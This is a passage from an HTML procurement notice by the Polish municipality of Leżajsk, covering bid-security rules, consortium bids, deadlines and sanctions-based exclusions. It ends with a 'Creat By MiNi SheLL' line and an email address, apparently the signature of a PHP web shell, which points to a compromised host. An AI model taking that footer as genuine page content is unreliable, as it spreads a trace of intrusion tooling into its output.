udzielenie zamówienia przez Wykonawców, oświadczenie składa każdy z Wykonawców, składa również podmiot udostępniający zasoby(jeśli dotyczy)). <br/>	Uzupełniony Szczegółowy OPZ – sporządzony w oparciu o wymogi załącznika nr 3 do SWZ jako przedmiotowy środek dowodowy. <br/>	Zobowiązanie podmiotu udostępniającego zasoby – jeżeli dotyczy<br/>	Pełnomocnictwo upoważniające do złożenia oferty – jeżeli dotyczy <br/>	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/> Oświadczenie Wykonawców wspólnie ubiegających się o udzielnie zamówienia (składane na podstawie art. 117 ust. 4 ustawy Pzp, jeśli dot., dla części nr 6) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Oferta musi być zabezpieczona wadium o wartości 4 500,00 zł (słownie: cztery tysiące pięćset złotych 00/100 złotych). Wymóg dotyczy konieczności zabezpieczenia oferty dla Zadania nr 1. W pozostałym zakresie Zamawiający nie wymaga wniesienia wadium. <br/>2.	Wadium musi zostać wniesione przed upływem terminu składania ofert, według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>2.1.	pieniądzu;<br/>2.2.	gwarancjach bankowych;<br/>2.3.	gwarancjach ubezpieczeniowych;<br/>2.4.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2020r. poz. 299).<br/>3.	Wadium musi obejmować pełen okres związania ofertą. <br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego<br/>Bank Pekao SA I O. w Leżajsku nr 45 1240 2630 1111 0000 3637 1846<br/>(w tytule przelewu zaleca się wpisać nazwę i sygnaturę postępowania). <br/>5.	Wadium musi wpłynąć na wskazany rachunek bankowy najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>6.	Wadium wnoszone w formie poręczeń lub gwarancji należy załączyć do oferty w oryginale w postaci elektronicznej oraz powinno zawierać:<br/>6.1.	nazwę i adres siedziby Wykonawcy<br/>6.2.	wskazanie Beneficjenta poręczenia lub gwarancji, którym musi być Gmina Leżajsk, z siedzibą: ul. Łukasza Opalińskiego 2, 37-300 Leżajsk NIP: 816-15-93-943<br/>6.3.	wskazanie podmiotu udzielającego gwarancji lub poręczenia;<br/>6.4.	określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem;<br/>6.5.	kwotę gwarancji/poręczenia;<br/>6.6.	termin ważności gwarancji lub poręczenia obejmujący cały okres związania ofertą;<br/>6.7.	bezwarunkowe zobowiązanie wystawcy poręczenia lub gwarancji do zapłaty kwoty wadium, na pierwsze pisemne żądanie Zamawiającego, w sytuacjach określonych<br/>w art. 98 ust. 6 ustawy PZP.<br/>7.	Wykonawca zobowiązany jest wnieść wadium minimum na okres związania ofertą.<br/>8.	Zamawiający zwróci wadium na zasadach określonych w art. 98 ust. 1-5 ustawy Pzp. <br/>9.	W przypadku, gdy Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>10.	Zamawiający zatrzyma wadium wraz z odsetkami, a w przypadku wadium wniesionego<br/>w formie gwarancji lub poręczenia, wystąpi odpowiednio do gwaranta lub poręczyciela<br/>z żądaniem zapłaty wadium, w przypadkach określonych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, wypełniony druk oświadczenia, wg Załącznika Nr 2 do SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału<br/>w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <br/>4.	Zgodnie z art. 117 ust. 4 ustawy Pzp, w przypadkach, o których mowa a art. 117 ust. 2 i 3 ustawy Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświadczenie – Załącznik Nr 9 do SWZ z którego wynika, które dostawy wykonują poszczególni wykonawcy. - (dotyczy części nr 6).<br/>5.	Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu Cywilnego.<br/>6.	Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>7.	Przed podpisaniem umowy od Wykonawców ubiegających się wspólnie o zamówienie publiczne, których oferta została wybrana Zamawiający będzie żądać umowy regulującej ich współpracę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-08 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy na stronie internetowej prowadzonego postępowania - na Platformie e- Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-08 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-06</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający ponadto wykluczy z postępowania o udzielenie zamówienia na podstawie art. 5k Rozporządzenia Rady (UE) nr 833/2014 z dnia 31 lipca 2014 r. dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie, dodanym Rozporządzeniem Rady (UE) 2022/576 z dnia 8 kwietnia 2022r. w sprawie zmiany rozporządzenia (UE) nr 833/2014 dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz. Urz. UE nr L 111 z 8.04.2022 r. str. 1) oraz art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r. poz. 507) oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2023 roku poz. 507) oraz art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r. poz. 507) tj.:<br/>1)	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 (tj. ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz.U. z 2024 r. poz. 507 z późń. zm.);<br/>2)	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 (tj. ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz.U. z 2024 r. poz. 507 z późń. zm.);<br/>3)	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 (tj. ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz.U. z 2024 r. poz. 507 z późń. zm.)<br/>Wykluczenie następuje na okres trwania okoliczności określonych w ppkt 1-3 powyżej.

Creat By MiNi SheLL
Email: jattceo@gmail.com